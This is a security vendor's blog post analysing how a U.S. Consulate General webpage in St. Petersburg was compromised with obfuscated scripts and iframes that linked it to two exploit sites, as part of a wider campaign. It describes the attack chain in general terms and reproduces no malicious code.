Big fish caught in the net

A few days ago SophosLabs became aware of a malicious script detection (Mal/ObfJS-C) triggering on webpages of the U.S. Consulate General in St. Petersburg, Russia.

We immediately checked the site but could not reproduce the detection. However, we were able to retrieve a copy of the page from an internet cache. The page did indeed contain a malicious script at the start of the body content:


As you can see, the malicious script is heavily obfuscated, and further analysis was required in order to work out exactly what was going on. Feeding the data into one of our automation systems, we were able to see the purpose of the script – it attempts to write a malicious Iframe to the page:

This Iframe then tries to silently load further malicious code from a remote server.

So, was this a targeted attack? Had someone specifically hacked this high profile site? Such questions are hard, and often impossible, to answer. However, as described in a previous blog entry, our web analysis automation system can often give us more insight into attacks, helping us to see the bigger picture. When querying data from the past week we found over 400 related webpages:


Click to enlarge the image (ensure that you fully enlarge the subsequent image in cases where the browser attempts to fit it onto the screen).

For clarity, the bulk of the related pages are not plotted on the flowchart. Nonetheless, it quickly gives us useful information about the attack:

  1. You can see a large group of nodes on the left hand side. Each node represents a compromised web page. The node highlighted in yellow is the U.S. Consulate General site.
  2. These nodes link to just two different nodes. These two nodes represent the two malicious attack sites.
  3. Each attack site use a variety of exploits to install a Trojan.

You will notice the U.S. Consulate General site links to both attack sites.  Rechecking the cached page confirms the page is compromised with two malicious additions. In addition to the Mal/ObfJS-C script, there is an additional malicious Iframe at the bottom of the page:

The top of the flowchart shows the attack site linked via this Iframe. The attack site linked via the Mal/ObfJS-C script is at the bottom.

Attack 1 (top of flowchart)

  • A handful of pages, hosted on sites in the US and Russia have all been compromised, with the addition of a malicious script (pro-actively detected as Mal/ObfJS-C).
  • Malicious script content (pro-actively detected as JS/Doad-E) is loaded from a site hosted in the US.
  • This script attempts to exploit several browser vulnerabilities in order to install a Trojan (pro-actively detected as Mal/Packer) on the victim machine.

Attack 2 (bottom of flowchart)

  • A large number of pages on sites hosted in several different countries have been compromised with a malicious script (pro-actively detected as Mal/ObfJS-C). Compromised sites are mostly quite small, and for a diverse range of topics from pizza delivery to motor sport. Most are Russian.
  • The script writes an Iframe to the page in order to silently load malicious content from an attack site hosted in the US. The malicious script at this attack site is proactively detected by Sophos as Troj/Mulex-A.
  • This script attempts to exploit several browser vulnerabilities in order to install a Trojan (proactively detected as Mal/Behav-119).

The purpose of the attacks is to infect victims with Trojans from the two attack sites. As discussed in a recent paper, the increased use of automation to continually re-encrypt/pack/obfuscate the Trojans highlights the need for good generic detection technology. A system to continuously monitor these files in order to maintain detection is essential.

So, to answer the question of whether the U.S. Consulate General site was specifically targeted in this attack – my answer is no, probably not. The prevalence of other much smaller sites compromised in exactly the same way (in just seven days worth of data) suggests that the hackers just happened to have caught a big fish as they trawled for vulnerable servers. It just goes to show that security is important on all machines hosting both small and large websites.

Thankfully, the U.S. Consulate General site was cleaned up quickly, something which is sadly not the case for a lot of the smaller compromised sites we have seen.